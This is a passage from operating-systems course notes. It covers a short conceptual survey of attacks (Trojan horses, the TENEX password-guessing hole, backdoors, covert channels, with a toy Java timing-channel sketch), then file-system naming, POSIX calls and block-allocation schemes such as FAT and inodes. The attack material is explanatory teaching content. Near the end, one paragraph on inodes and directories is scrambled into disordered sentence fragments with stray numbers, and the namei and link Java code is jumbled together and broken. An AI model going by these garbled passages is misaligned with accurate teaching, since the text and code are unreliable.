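        byte[] respond(byte[] challenge) throws Exception {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(key);
            return mac.doFinal(challenge);
        }

        // System side: compare the user's response with its own transform.
        boolean verify(byte[] challenge, byte[] response) throws Exception {
            return MessageDigest.isEqual(respond(challenge), response);
        }
    }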

A Sampling of Attacks

Some common attacks on computer systems:

Trojan Horse - This is a benign-looking program that steals information as part of its function. An example is a script that mimics the login prompt, takes a user's password, saves it for the owner of the script, and logs the user in. The legitimate user has access to the account, but so does the owner of the script.

Password Guessing - we talked about this with passwords. I pause to mention the infamous TENEX security hole that Tanenbaum discusses. TENEX allowed user functions to be called on each page fault, and passwords were checked letter-by-letter, sequentially. Some clever user realized that this allowed guessing a password one letter at a time instead of one whole password at a time: arrange the candidate password in memory so that the letter being guessed is on one page and the rest is on another, with the second page forced out of memory. If the first letter was correct, there would be a page fault when the system faulted the second page into memory to check it. By repeating the process the whole password could be guessed sequentially. This is an interesting example of how multiple OS features combine to affect security.

Backdoors - sometimes developers leave privileged debugging hooks in place in production systems. One of the well known offenders here is sendmail. Other production systems used to ship with well-known user names with well-known passwords for remote maintenance.

Buffer overruns - forcing a program to overrun a variable on the stack and insert code in it that the attacker wants run.

Social Engineering - This is by far the most difficult to control. An attacker simply lies to a human being and gets the information that they want. The only real cure for this is to educate anyone who has security information (that is, everyone) about security.

Viruses and Worms

Viruses are programs contained in other programs; worms are self-replicating independent programs. The distinction is in the method of transmission: a virus needs a host program to be run to propagate it, while a worm has no such host and propagates itself. Both have made national news in their malevolent forms, but both could be used for benign purposes; one can imagine benign programs propagated the same way (virus checkers, for example).

Covert Channels

A covert channel is an unintentional communication channel in the system, often usable for malicious purposes. For example, 2 processes banned from communicating directly can use the following scheme: one process repeatedly performs a computation known to take a fixed time, while the other process alternately loads and unloads the machine with computationally intensive child processes, depending on the bit it wants to send. Loading the machine corresponds to a 1 and unloading the machine a 0. The listening process knows that if its computation takes longer than usual it should record a 1, and if it's shorter, record a 0. The two can work out the timing and loading (statistically, if necessary) to communicate. Covert channels are necessarily low bandwidth (though they needn't be too low to be useful). Most systems don't stop covert channels, and stopping them is difficult: in the example above, the system would have to guarantee that the system load stay fixed, which would mean slowing the system when it was unloaded. Only systems that hold serious enough data go to that trouble.
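To make the load-modulated covert channel concrete, here is a toy Java sketch (an illustration only; a real channel would need the statistical calibration mentioned above, and the threshold is a hypothetical tuning parameter).

    class CovertChannel {
        static volatile long sink;   // keeps the busy loops from being optimized away

        // Receiver: time a fixed computation; if it ran slow, the sender was loading the CPU.
        static int receiveBit(long thresholdNanos) {
            long start = System.nanoTime();
            long x = 0;
            for (int i = 0; i < 50_000_000; i++) x += i;   // fixed amount of work
            sink = x;
            return (System.nanoTime() - start > thresholdNanos) ? 1 : 0;
        }

        // Sender: to send a 1, load the machine for one time slot; to send a 0, unload it.
        static void sendBit(int bit, long slotMillis) throws InterruptedException {
            long end = System.currentTimeMillis() + slotMillis;
            if (bit == 1)
                while (System.currentTimeMillis() < end) sink++;   // spin: load the machine
            else
                Thread.sleep(slotMillis);                          // unload the machine
        }
    }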

CHAPTER 11
FILE SYSTEM IMPLEMENTATION

First we look at files from the point of view of a person or program using the file system, and then we consider how this user interface is implemented.

The User Interface to Files

Just as the process abstraction beautifies the hardware by making a single CPU (or a small number of CPUs) appear to be many CPUs, one per "user," the file system beautifies the hardware disk, making it appear to be a large number of disk-like objects called files. Like a disk, a file is capable of storing a large amount of data cheaply, reliably, and persistently. The fact that there are lots of files is one form of beautification: Each file is individually protected, so each user can have his own files without the expense of requiring each user to buy his own disk. Each user can have lots of files, which makes it easier to organize persistent data. The file system also makes each individual file more beautiful than a real disk. At the very least, it erases block boundaries, so a file can be any length (not just a multiple of the block size) and programs can read and write arbitrary regions of the file without worrying about whether they cross block boundaries. Some systems (not Unix) also provide assistance in organizing the contents of a file.

Systems use the same sort of device (a disk drive) to support both virtual memory and files. The question arises why these have to be distinct facilities, with vastly different user interfaces. The answer is that they don't. In Multics, there was no difference whatsoever. Everything in Multics was a segment. The address space of each running process consisted of a set of segments (each with its own segment number), and the "file system" was simply a set of named segments. To access a segment from the file system, a process would pass its name to a system call that assigned a segment number to it. From then on, the process could read and write the segment simply by executing ordinary loads and stores. For example, if the segment was an array of integers, the program could access the i-th number with a notation like a[i] rather than having to seek to the appropriate offset and then execute a read system call. If the block of the file containing this value wasn't in memory, the array access would cause a page fault, which was serviced as explained in the previous chapter.
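Most modern systems approximate this style of access with memory-mapped files. Here is a small Java sketch (the file name is hypothetical): after mapping, the file is read and written like an in-memory array, with no explicit read or write calls.

    import java.io.RandomAccessFile;
    import java.nio.MappedByteBuffer;
    import java.nio.channels.FileChannel;

    class MappedDemo {
        public static void main(String[] args) throws Exception {
            try (RandomAccessFile f = new RandomAccessFile("data.bin", "rw");
                 FileChannel ch = f.getChannel()) {
                // Map the first 4096 bytes of the file into the address space.
                MappedByteBuffer a = ch.map(FileChannel.MapMode.READ_WRITE, 0, 4096);
                for (int i = 0; i < 1024; i++)
                    a.putInt(4 * i, i);        // like a[i] = i, but backed by the file
                int x = a.getInt(4 * 10);      // like x = a[10]; paging services it if needed
            }
        }
    }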

This user-interface idea, sometimes called "single-level store," is a great idea. So why is it not common in current operating systems? In other words, why are virtual memory and files presented as very different kinds of objects? There are possible explanations one might propose:

The address space of a process is small compared to the size of a file system. There is no reason why this has to be so. In Multics, a process could have up to 256K segments, but each segment was limited to 64K words. Multics allowed for lots of segments because every "file" in the file system was a segment. The upper bound of 64K words per segment was considered large by the standards of the time; the hardware actually allowed segments of up to 256K words (over one megabyte). Most new processors introduced in the last few years allow 64-bit virtual addresses, and in a few years such processors will dominate. So there is no reason why the virtual address space of a process cannot be large enough to include the entire file system.

The virtual memory of a process is transient - it goes away when the process terminates - while files must be persistent. Multics showed that this doesn't have to be true. A segment can be designated as "permanent," meaning that it should be preserved after the process that created it terminates. Permanent segments do raise a need for one "file-system-like" facility: the ability to give names to segments so that new processes can find them.

Files are shared by multiple processes, while the virtual address space of a process is associated with only that process. Most modern operating systems (including most variants of Unix) provide some way for processes to share portions of their address spaces anyhow, so this is a particularly weak argument for a distinction between files and segments.

The real reason single-level store is not ubiquitous is probably a concern for efficiency. The usual file-system interface encourages a particular style of access: Open a file, go through it sequentially, copying big chunks of it to or from main memory, and then close it. While it is possible to access a file like an array of bytes, jumping around and accessing the data in tiny pieces, it is awkward. Operating system designers have found ways to implement files that make the common "file-like" style of access very efficient. While there appears to be no reason in principle why memory-mapped files cannot be made to give similar performance when they are accessed in this way, in practice the added functionality of mapped files always seems to pay a price in performance. Besides, if it is easy to jump around in a file, applications programmers will take advantage of it, overall performance will suffer, and the file system will be blamed.

Naming

Every file system provides some way to give a name to each file. We will consider only names for individual files here, and talk about directories later. The name of a file is (at least sometimes) meant to be used by human beings, so it should be easy for humans to use. Different operating systems put different restrictions on names:

Size

Some systems put severe restrictions on the length of names. For example DOS restricts names to 11 characters, while early versions of Unix (and some still in use today) restrict names to 14 characters. The Macintosh operating system, Windows 95, and most modern versions of Unix allow names to be essentially arbitrarily long. I say "essentially" since names are meant to be used by humans, so they don't really need to be all that long. A name that is 100 characters long is just as difficult to use as one that is forced to be under 11 characters long (but for different reasons). Most modern versions of Unix, for example, restrict names to a limit of 255 characters.

Case

Are upper and lower case letters considered different? The Unix tradition is to consider the names Foo and foo to be completely different and unrelated names. In DOS and its descendants, however, they are considered the same. Some systems translate names to one case (usually upper case) for storage. Others retain the original case, but consider it simply a matter of decoration. For example, if you create a file named "Foo," you could open it as "foo" or "FOO," but if you list the directory, you would still see the file listed as "Foo."

Character Set

Different systems put different restrictions on what characters can appear in file names. The Unix directory structure supports names containing any character other than NUL (the byte consisting of all zero bits), but many utility programs (such as the shell) would have trouble with names that have spaces, control characters or certain punctuation characters (particularly '/'). MacOS allows all of these (e.g., it is not uncommon to see a file name with the Copyright symbol © in it). With the world-wide spread of computer technology, it is becoming increasingly important to support languages other than English, and in fact alphabets other than Latin. There is a move to support character strings (and in particular file names) in the Unicode character set, which devotes 16 bits to each character rather than 8 and can represent the alphabets of all major modern languages from Arabic to Devanagari to Telugu to Khmer.

Format

It is common to divide a file name into a base name and an extension that indicates the type of the file. DOS requires that each name be composed of a base name of eight or fewer characters and an extension of three or fewer characters. When the name is displayed, it is represented as base.extension. Unix internally makes no such distinction, but it is a common convention to include exactly one period in a file name (e.g. foo.c for a C source file).

File Structure

Unix hides the "chunkiness" of tracks, sectors, etc. and presents each file as a "smooth" array of bytes with no internal structure. Application programs can, if they wish, use the bytes in the file to represent structures. For example, a wide-spread convention in Unix is to use the newline character (the character with bit pattern 00001010) to break text files into lines. Some other systems provide a variety of other types of files. The most common are files that consist of an array of fixed or variable size records and files that form an index mapping keys to values. Indexed files are usually implemented as B-trees.
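For instance, an application that wants fixed-size records on top of Unix's smooth byte array can impose them itself. A small sketch (the 64-byte record size is an arbitrary, application-defined assumption):

    import java.io.RandomAccessFile;

    class RecordFile {
        static final int RECORD_SIZE = 64;   // assumed, application-defined record length

        // Read record n by computing its byte offset in the flat byte array.
        static byte[] readRecord(RandomAccessFile f, long n) throws Exception {
            byte[] rec = new byte[RECORD_SIZE];
            f.seek(n * RECORD_SIZE);
            f.readFully(rec);
            return rec;
        }
    }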

File Types

Most systems divide files into various "types." The concept of "type" is a confusing one, partially because the term "type" can mean different things in different contexts. Unix initially supported only four types of files: directories, two kinds of special files (discussed later), and "regular" files. Just about any type of file is considered a "regular" file by Unix. Within this category, however, it is useful to distinguish text files from binary files; within binary files there are executable files (which contain machine-language code) and data files. Text files might be source files in a particular programming language (e.g. C or Java) or they may be human-readable text in some mark-up language such as html (hypertext markup language). Data files may be classified according to the program that created them or is able to interpret them, e.g., a file may be a Microsoft Word document or Excel spreadsheet or the output of TeX. The possibilities are endless.

File types may be enforced

• Not at all,
• Only by convention,
• By certain programs (e.g. the Java compiler), or
• By the operating system itself.

Some systems enforce the types of files more vigorously than others; Unix tends to be very lax in enforcing types. For example, the Unix Java compiler refuses to believe that a file contains Java source unless its name ends with .java.

In general (not just in Unix) there are three ways of indicating the type of a file:

• The operating system may record the type of a file in meta-data stored separately from the file, but associated with it. Unix only provides enough meta-data to distinguish a regular file from a directory (or special file), but other systems support more types.

• The type of a file may be indicated by its name. Sometimes this is just a convention, and sometimes it's enforced by the OS or by certain programs.

• The type of a file may be indicated by part of its contents, such as a header made up of the first few bytes of the file. In Unix, files that store executable programs start with a two-byte magic number that identifies them as executable and selects one of a variety of executable formats. In the original Unix executable format, called the a.out format, the magic number is the octal number 0407, which happens to be the machine code for a branch instruction on the PDP-11 computer, one of the first computers to implement Unix. The operating system could run a file by loading it into memory and jumping to the beginning of it. The 0407 code, interpreted as an instruction, jumps to the word following the 16-byte header, which is the beginning of the executable code in this format. The PDP-11 computer is extinct by now, but it lives on through the 0407 code!
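As a sketch of the contents-based approach, the following Java fragment checks the first two bytes of a file against the a.out magic number. The byte order shown assumes the PDP-11's little-endian word layout; that detail is an assumption made for illustration.

    import java.io.DataInputStream;
    import java.io.FileInputStream;

    class MagicCheck {
        // Compare the first two bytes of the file against the a.out magic number.
        static boolean isAout(String path) throws Exception {
            try (DataInputStream in = new DataInputStream(new FileInputStream(path))) {
                int b0 = in.readUnsignedByte();
                int b1 = in.readUnsignedByte();
                int magic = b0 | (b1 << 8);   // assemble a little-endian 16-bit word
                return magic == 0407;         // 0407 octal = 263 decimal
            }
        }
    }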

Access Modes

Systems support various access modes for operations on a file:

• Sequential: Read or write the next record or next n bytes of the file. Usually, sequential access also allows a rewind operation.

• Random: Read or write the nth record or bytes i through j. Unix provides an equivalent facility by adding a seek operation to the sequential operations listed above. This packaging of operations allows random access but encourages sequential access.

• Indexed: Read or write the record with a given key. In some systems the "key" need not be unique: there can be more than one record with the same key. In this case, programs use a combination of indexed and sequential operations: Get the first record with a given key, then get other records with the same key by doing sequential reads.

File Attributes

This is the area where there is the most variation among file systems. Attributes can be grouped by general category:

Name

Ownership and Protection

Owner, owner's "group," creator, access-control list (information about who can do what to this file; for example, perhaps the owner can read or modify it, other members of his group can only read it, and others have no access).

Time stamps

Time created, time last modified, time last accessed, time the attributes were last changed. Unix maintains the last three of these. Some systems record not only when the file was last modified, but by whom.

Sizes

Current size, size limit, "high-water mark," space consumed (which may be larger than size because of internal fragmentation or smaller because of various compression techniques).

Type Information

As described above: file is ASCII, is executable, is a "system" file, is an Excel spreadsheet, etc.

Misc

Some systems have attributes describing how the file should be displayed when a directory is listed. For example MacOS records an icon to represent the file and the screen coordinates where it was last displayed. DOS has a "hidden" attribute meaning that the file is not normally shown. Unix achieves a similar effect by convention: The ls program that is usually used to list files does not show files with names that start with a period unless you explicitly request it to (with the -a option).

Unix records a fixed set of attributes in the meta-data associated with a file. If you want to record some fact about the file that is not included among the supported attributes, you have to use one of the tricks listed above for recording type information: encode it in the name of the file, put it into the body of the file itself, or store it in a file with a related name (e.g. "foo.attributes"). Other systems (notably MacOS and Windows NT) allow new attributes to be invented on the fly. In MacOS, each file has a resource fork, which is a list of (attribute-name, attribute-value) pairs. The attribute name can be any four-character string, and the attribute value can be anything at all. Indeed, some kinds of files put the entire "contents" of the file in an attribute and leave the "body" of the file (called the data fork) empty.
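On a POSIX system, many of these attributes can be inspected from Java through the java.nio.file API. A small sketch (the file name is hypothetical, and the POSIX attribute view is only available on Unix-like systems):

    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.nio.file.Paths;
    import java.nio.file.attribute.PosixFileAttributes;
    import java.nio.file.attribute.PosixFilePermissions;

    class ShowAttributes {
        public static void main(String[] args) throws Exception {
            Path p = Paths.get("foo.c");
            PosixFileAttributes a = Files.readAttributes(p, PosixFileAttributes.class);
            System.out.println("owner:         " + a.owner());
            System.out.println("group:         " + a.group());
            System.out.println("size:          " + a.size());
            System.out.println("last modified: " + a.lastModifiedTime());
            System.out.println("last accessed: " + a.lastAccessTime());
            System.out.println("permissions:   " + PosixFilePermissions.toString(a.permissions()));
        }
    }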

Operations

POSIX, a standard API (application programming interface) based on Unix, provides the following operations (among others) for manipulating files:

• fd = open(name, operation)
• fd = creat(name, mode)
• status = close(fd)
• byte_count = read(fd, buffer, byte_count)
• byte_count = write(fd, buffer, byte_count)
• offset = lseek(fd, offset, whence)
• status = link(oldname, newname)
• status = unlink(name)
• status = stat(name, buffer)
• status = fstat(fd, buffer)
• status = utimes(name, times)
• status = chown(name, owner, group) or fchown(fd, owner, group)
• status = chmod(name, mode) or fchmod(fd, mode)
• status = truncate(name, size) or ftruncate(fd, size)

Some types of arguments and results need explanation.

Name: A character-string name for a file.

Operation: An integer code, one of read, write, read and write, and perhaps a few other possibilities such as append only.

Mode: A bit-mask specifying protection information.

Status: Many functions return a "status" which is either 0 for success or -1 for errors (there is another mechanism to get more information about what went wrong). Other functions also use -1 as a return value to indicate an error.

Fd: A "file descriptor," which is a small non-negative integer used as a short, temporary name for a file during the lifetime of a process.

Buffer: The memory address of the start of a buffer for supplying or receiving data.

Whence: One of three codes, signifying from start, from current location, or from end.

The open call finds a file and assigns a descriptor to it. It also indicates how the file will be used by this process (read only, read/write, etc). The creat call is similar, but creates a new (empty) file. The mode argument specifies protection attributes (such as "writable by owner but read-only by others") for the new file. (Most modern versions of Unix have merged creat into open by adding an optional mode argument and allowing the operation argument to specify that the file is automatically created if it doesn't already exist.) The close call simply announces that fd is no longer in use and can be reused for another open or creat.
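Java does not expose these calls directly, but its RandomAccessFile goes through the same sequence underneath. The following sketch mirrors the usual open/write/lseek/read/close pattern (the mapping noted in the comments is an analogy, not the actual system-call interface):

    import java.io.RandomAccessFile;
    import java.nio.charset.StandardCharsets;

    class CallSequence {
        public static void main(String[] args) throws Exception {
            RandomAccessFile f = new RandomAccessFile("example.dat", "rw"); // fd = open(name, op)
            f.write("hello".getBytes(StandardCharsets.UTF_8)); // byte_count = write(fd, buf, n)
            f.seek(0);                                          // offset = lseek(fd, 0, from start)
            byte[] buf = new byte[5];
            int n = f.read(buf);                                // byte_count = read(fd, buf, n)
            System.out.println(n + " bytes: " + new String(buf, StandardCharsets.UTF_8));
            f.close();                                          // status = close(fd)
        }
    }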

The read and write operations transfer data between a file and memory. The starting location in memory is indicated by the buffer parameter; the starting location in the file (called the seek pointer) is wherever the last read or write left off. The result is the number of bytes transferred. For write it is normally the same as the byte_count parameter unless there is an error; for read it may be smaller if the seek pointer starts out near the end of the file. The lseek operation adjusts the seek pointer (it is also automatically updated by read and write). The specified offset is added to zero, the current seek pointer, or the current size of the file, depending on the value of whence. It is also common to have a separate append operation for writing to the end of a file.

The function link adds a new name (alias) to a file, while unlink removes a name. There is no function to delete a file; the system automatically deletes it when there are no remaining names for it.

The stat function retrieves meta-data about the file and puts it into a buffer (in a fixed, documented format), while the remaining functions can be used to update the meta-data: utimes updates time stamps, chown updates ownership, chmod updates protection information, and truncate changes the size (files can be made bigger by write, but only truncate can make them smaller). Most of these functions come in two flavors: one that takes a file name and one that takes a descriptor for an open file. For more detail, type something like "man 2 lseek" to any Unix system; the '2' means to look in section 2 of the manual, where system calls are explained.

Other systems have similar operations, each with slightly different semantics. For example, indexed or indexed sequential files would require a version of seek to specify a key rather than an offset.

The User Interface to Directories

We already talked about file names. One important feature that a file name should have is that it be unambiguous: There should be at most one file with any given name. The symmetrical condition, that there be at most one name for any given file, is not necessarily a good thing. Sometimes it is handy to be able to give multiple names to a file. When we consider implementation, we will describe two different ways to implement multiple names for a file, each with slightly different semantics.

If there are a lot of files in a system, it may be difficult to avoid giving two files the same name, particularly if there are multiple users independently making up names. One technique to assure uniqueness is to prefix each file name with the name (or user id) of the owner. In some early operating systems, that was the only assistance the system gave in preventing conflicts. A better idea is the hierarchical directory structure, first introduced by Multics, then popularized by Unix, and now found in virtually every operating system. You probably already know about hierarchical directories, but I would like to describe them from an unusual point of view first, and then explain how this point of view is equivalent to the more familiar version.

Each file is named by a sequence of names. Although all modern operating systems use this technique, each uses a different character to separate the components of the sequence when displaying it as a character string: Multics uses '>', Unix uses '/', DOS and its descendants use '\', and MacOS uses ':'. Sequences make it easy to avoid naming conflicts. First, assign a sequence to each user and only let him create files with names that start with that sequence. For example, I might be assigned the sequence ("usr", "solomon"), written in Unix as /usr/solomon. So far, this is the same as just appending the user name to each file name. But it allows me to further classify my own files to prevent conflicts, particularly if there are multiple projects making up names. When I start a new project, I can create a new sequence by appending the name of the project to the end of the sequence assigned to me, and then use this prefix for all files in the project. For example, I might choose /usr/solomon/cs537 for files associated with this course, and name them /usr/solomon/cs537/foo, /usr/solomon/cs537/bar, and so on.

As an extra aid, the system allows me to specify a "default prefix" and a short-hand for writing names that start with that prefix. In Unix, I use the system call chdir to specify a prefix, and whenever I use a name that does not start with '/', the system automatically adds that prefix.

It is customary to think of the directory system as a directed graph, with names on the edges. One node is designated as the root node, and the rule is enforced that there cannot be two edges with the same name coming out of one node. With this rule, we can use path names to name nodes: start at the root node and treat the path name as a sequence of directions, telling us which edge to follow at each step. It may be impossible to follow the directions (because they tell us to use an edge that does not exist), but if it is possible to follow the directions, they will lead us unambiguously to one node. Thus path names can be used as unambiguous names for nodes. In fact, this is how the directory system is actually implemented, as we will see. However, I think it is useful to think of "path names" simply as long names to avoid naming conflicts, since it clearly separates the interface from the implementation. Each path in the graph is associated with a sequence of names: the names on the edges that make up the path. In Unix, the sequence of names is usually called a path name.

Implementing File Systems

Files

We will assume that all the blocks of the disk are given block numbers starting at zero and running through consecutive integers up to some maximum. We will further assume that blocks with numbers that are near each other are located physically near each other on the disk (e.g., same cylinder), so that the arithmetic difference between the numbers of two blocks gives a good estimate of how long it takes to get from one to the other. First let's consider how to represent an individual file. There are (at least!) four possibilities:

Contiguous: The blocks of a file are the blocks numbered n, n+1, n+2, ..., m. We can represent any file with a pair of numbers: the block number of the first block and the length of the file (in blocks). The advantages of this approach are:

• It's simple.
• The blocks of the file are all physically near each other on the disk and in order, so that a sequential scan through the file will be fast.

The problem with this organization is that you can only grow a file if the block following the last block in the file happens to be free. Otherwise, you would have to find a long enough run of free blocks to accommodate the new length of the file and copy it. As a practical matter, operating systems that use this organization require the maximum size of the file to be declared when it is created and pre-allocate space for the whole file. Even then, storage allocation has all the problems we considered when studying main-memory allocation, including external fragmentation.

Linked List: A file is represented by the block number of its first block, and each block contains the block number of the next block of the file. This representation avoids the problems of the contiguous representation: We can grow a file by linking any disk block onto the end of the list, and there is no external fragmentation. However,
it introduces a new problem: Random access is effectively impossible. To find the 100th block of a file, we have to read the first 99 blocks just to follow the list. We also lose the advantage of very fast sequential access to the file, since its blocks may be scattered all over the disk. However, if we are careful when choosing blocks to add to a file, we can retain pretty good sequential access performance.
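The cost difference is easy to see in code. In the sketch below (an abstraction: the next array stands in for the link fields stored in the disk blocks), finding block k is constant-time arithmetic for a contiguous file, but requires chasing k links, each one a disk read, for a linked file.

    class FileLayout {
        static int[] next;   // next[b] = block following b (stand-in for on-disk link fields)

        // Contiguous: block k of a file starting at block 'start' is pure arithmetic.
        static int contiguousBlock(int start, int k) {
            return start + k;
        }

        // Linked list: chase k links; in reality each step costs a disk read.
        static int linkedBlock(int first, int k) {
            int b = first;
            for (int i = 0; i < k; i++)
                b = next[b];
            return b;
        }
    }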

Both the space overhead (the percentage of the space taken up by pointers) and the time overhead (the percentage of the time seeking from one place to another) can be decreased by using larger blocks. The hardware designer fixes the block size (which is usually quite small), but the software can get around this problem by using "virtual" blocks, sometimes called clusters. The OS simply treats each group of (say) four contiguous physical disk sectors as one cluster. Large clusters, particularly if they can be of variable size, are sometimes called extents. Extents can be thought of as a compromise between linked and contiguous allocation.

Disk Index: The idea here is to keep the linked-list representation, but take the link fields out of the blocks and gather them together all in one place. At some fixed place on disk, allocate an array I with one element for each block on the disk, and move the link field from block n to I[n] (see Figure 11.17 on page 382). This approach is used in the "FAT" file system of DOS, OS/2 and older versions of Windows. The whole array of links, called a file access table (FAT), is now small enough that it can be read into main memory when the system starts up. Accessing the 100th block of a file still requires walking through 99 links of the list, but now the entire list is in memory, so the time to traverse it is negligible (recall that a single disk access takes as long as tens or even hundreds of thousands of instructions). This representation has the added advantage of getting the "operating system" stuff (the links) out of the pages of "user data". The pages of user data are now full-size disk blocks, and lots of algorithms work better with chunks that are a power of two bytes long. Also, it means that the OS can prevent users (who are notorious for screwing things up) from getting their grubby hands on the system data.

The main problem with this approach is that the index array I can get quite large with modern disks. For example, consider a 2 GB disk with 2K blocks. There are a million blocks, so a block number must be at least 20 bits. Rounded up to an even number of bytes, that's 3 bytes (4 bytes if we round up to a word boundary), so the array I is three or four megabytes. While that's not an excessive amount of memory given today's RAM prices, if we can get along with less, there are better uses for the memory.

File Index: Although a typical disk may contain tens of thousands of files, only a few of them are open at any one time, and it is only necessary to keep index information about open files in memory to get good performance. Unfortunately, the whole-disk index described in the previous paragraph mixes together index information about all the files on the disk, making it difficult to cache only information about open files. The inode structure introduced by Unix groups together index information about each file individually. The basic idea is to represent each file as a tree of blocks, with the data blocks as leaves.
Each internal block (called an indirect block in Unix jargon) is an array of block numbers, listing its children in order. If the root node is cached in memory, the "address" (block number) of any block of the file can be found without any disk accesses. If a disk block is 2K bytes and a block number is four bytes, 512 block numbers fit in a block, so a one-level tree (a single root node pointing directly to the leaves) can accommodate files up to 512 blocks, or one megabyte in size. A two-level tree, with 513 total indirect blocks, can handle files 512 times as large (up to one-half gigabyte).

The only problem with this idea is that it wastes space for small files. Any file with more than one block needs at least one indirect block to store its block numbers. A 4K file would require three 2K blocks, wasting up to one third of its space. Since many files are quite small, this is a serious problem. The Unix solution is to use a different kind of "block" for the root of the tree. An index node (or inode for short) contains almost all the meta-data about a file listed above: ownership, permissions, time stamps, etc. (but not the file name). Inodes are small enough that several of them can be packed into one disk block. In addition to the meta-data, an inode contains the block numbers of the first few blocks of the file.
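Anticipating the inode layout described below (a few direct pointers plus single and double indirect blocks), translating a position in the file to a disk block is just arithmetic plus a bounded number of indirect-block reads. A sketch, with the parameters and the readBlockPointers helper assumed for illustration:

    class Bmap {
        static final int N_DIRECT = 12;     // direct pointers in the inode (assumed)
        static final int PER_BLOCK = 512;   // 2K block / 4-byte block numbers

        static class Inode {
            int[] direct = new int[N_DIRECT];
            int singleIndirect;
            int doubleIndirect;
        }

        // Return the disk block number holding block k of the file.
        static int bmap(Inode ino, int k) {
            if (k < N_DIRECT)
                return ino.direct[k];                        // no extra I/O
            k -= N_DIRECT;
            if (k < PER_BLOCK)                               // one indirect-block read
                return readBlockPointers(ino.singleIndirect)[k];
            k -= PER_BLOCK;                                  // two indirect-block reads
            int[] outer = readBlockPointers(ino.doubleIndirect);
            return readBlockPointers(outer[k / PER_BLOCK])[k % PER_BLOCK];
        }

        // Stand-in for reading a disk block and viewing it as an array of block numbers.
        static int[] readBlockPointers(int blockNum) {
            return new int[PER_BLOCK];
        }
    }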

Directories A directory is simply a table mapping character-string human-readable names to information about files..into the inode? The earliest version of Unix had a bit in the meta-data to indicate whether the file was “small” or “big.791. the inode contained the block numbers of indirect blocks rather than data blocks. Inumber 0 is not used.196. ownership. each directory also two special entries: an entry with name “.552 bytes (slightly more than 246 bytes. which points to the parent of the directory in the tree and an entry with name “. A directory entry contains only two fields: a character-string name (up to 14 characters) and a two-byte integer called an inumber. which is interpreted as an index into an array of inodes in a fixed. Thus the inumber in a directory entry may designate a “regular” file or another directory.403. The algorithm to convert from a path name to an inumber might be written in Java as 185 . doubly. locating an arbitrary block of any file requires reading at most three I/O operations. Unix carefully limits the set of operating system calls to ensure that the set of directories is always a tree. An inode is 128 bytes long.”.e. size (in blocks) and the block numbers of 16 blocks of the file. However.888 bytes (about 32 GB) can be represented without using triply indirect blocks.120.5 version of Unix.364 blocks or 34. but stores only the first block number of the file in the directory entry. for such huge files. For convenience. To represent files with more than 16 blocks. a pointer to an indirect block containing pointers to the next several blocks of the file. The inode contains pointers to (i. permissions. and triply indirect blocks. Unix has an even simpler directory format. More recent versions of Unix contain pointers to indirect blocks in addition to the pointers to the first few data blocks.613. The root of the tree is the file with inumber 1 (some versions of Unix use other conventions for designating the root directory).”. The entire file is represented as a linked list of blocks using the disk index scheme described above. allowing room for the 15 block pointers plus lots of metadata. the size of the file cannot be represented as a 32-bit integer.” For a big file. A real-life example is given by the Solaris 2. Block numbers are four bytes and the size of a block is a parameter stored in the file system itself. Each entry contains the name of one file. so 2048 pointers fit in one block. allowing arbitrary graphs of nodes. A large file is thus a lop-sided tree. A file of up to 12+2048+2048*2048 = 4. which is the root of a two-level tree whose leaves are the next blocks of the file. CP/M used multiple directory entries with the same name and different values in a field called the extent number. All but the earliest version of DOS provide hierarchical directories using a scheme similar to the one used in Unix. the maximum file size is (12+2048+2048*2048+2048*2048*2048)*8192 = 70. and an index to the blocks of the file) are stored in the inode rather than the directory entry. time stamps. CP/M had only one directory for the entire system. A directory is represented like any other file (there's a bit in the inode to indicate that the file is a directory). its owner. The entries in each directory point to its children in the tree.376. Of course. which points to the directory itself. DOS uses a similar directory entry format. An inode has direct pointers to the first 12 blocks of the file. block numbers of) the first few blocks of the file. 
Of course, for such huge files, the size of the file cannot be represented as a 32-bit integer. Modern versions of Unix store the file length as a 64-bit integer, called a "long" integer in Java. Since the inode for a file is kept in memory while the file is open, locating an arbitrary block of any file requires at most three I/O operations, not counting the operation to read or write the data block itself.

Directories

A directory is simply a table mapping character-string human-readable names to information about files. The early PC operating system CP/M shows how simple a directory can be. Each entry contains the name of one file, its owner, size (in blocks) and the block numbers of 16 blocks of the file. To represent files with more than 16 blocks, CP/M used multiple directory entries with the same name and different values in a field called the extent number. CP/M had only one directory for the entire system.

DOS uses a similar directory entry format, but stores only the first block number of the file in the directory entry. The entire file is represented as a linked list of blocks using the disk index scheme described above. All but the earliest versions of DOS provide hierarchical directories using a scheme similar to the one used in Unix.

Unix has an even simpler directory format. A directory entry contains only two fields: a character-string name (up to 14 characters) and a two-byte integer called an inumber, which is interpreted as an index into an array of inodes in a fixed, known location on disk. All the remaining information about the file (size, ownership, time stamps, permissions, and an index to the blocks of the file) is stored in the inode rather than the directory entry. A directory is represented like any other file (there's a bit in the inode to indicate that the file is a directory). Thus the inumber in a directory entry may designate a "regular" file or another directory, which would in principle allow arbitrary graphs of nodes. However, Unix carefully limits the set of operating system calls to ensure that the set of directories is always a tree. The root of the tree is the file with inumber 1 (some versions of Unix use other conventions for designating the root directory). The entries in each directory point to its children in the tree. For convenience, each directory also contains two special entries: an entry with name "..", which points to the parent of the directory in the tree, and an entry with name ".", which points to the directory itself. Inumber 0 is not used, so an entry is marked "unused" by setting its inumber field to 0. The algorithm to convert from a path name to an inumber might be written in Java as

"/d/e/f") works something like this: if (namei(1. You can learn the inumber of a file if you like.type == DIRECTORY) throw new Exception("cannot link to a directory"). 186 . current = nameToInumber (inode[current]. path[i]). The procedure namei walks the directory tree. there can be more than one directory entry designating the same file. Otherwise. i++) { if (inode[current]. } return current. String name) (not shown) reads through the directory file represented by the inode node. starting at a given inode and following a path described by a sequence of strings. String[] path) { for (int i = 0. i<path. Since all the information about a file except its name is stored in the inode. Unix provides a system call link (old-name. If the argument is an absolute path name (it starts with ‘/’). } The procedure nameToInumber(Inode node. parse("/a/b/c")). int dir = namei(1. parse("/d/e")): if (dir==0 || inode[dir]. if (inode[target]. if (current == 0) throw new Exception("no such file or directory"). current is the current working directory. Files are always specified in Unix system calls by a character-string path name. parse("/d/e/f")) != 0) throw new Exception("file already exists").int namei(int current.type != DIRECTORY) throw new Exception("not a directory"). if (target==0) throw new Exception("no such directory"). There is a procedure with this name in the Unix kernel. int target = namei(1. new-name) to create new names for existing files. This allows multiple aliases (called links) for a file. Each system call that has a path name as an argument uses namei to translate it to an inumber.length. The call link ("/a/b/c".type != DIRECTORY) throw new Exception("not a directory"). looks for an entry matching the given name and returns the inumber contained in that 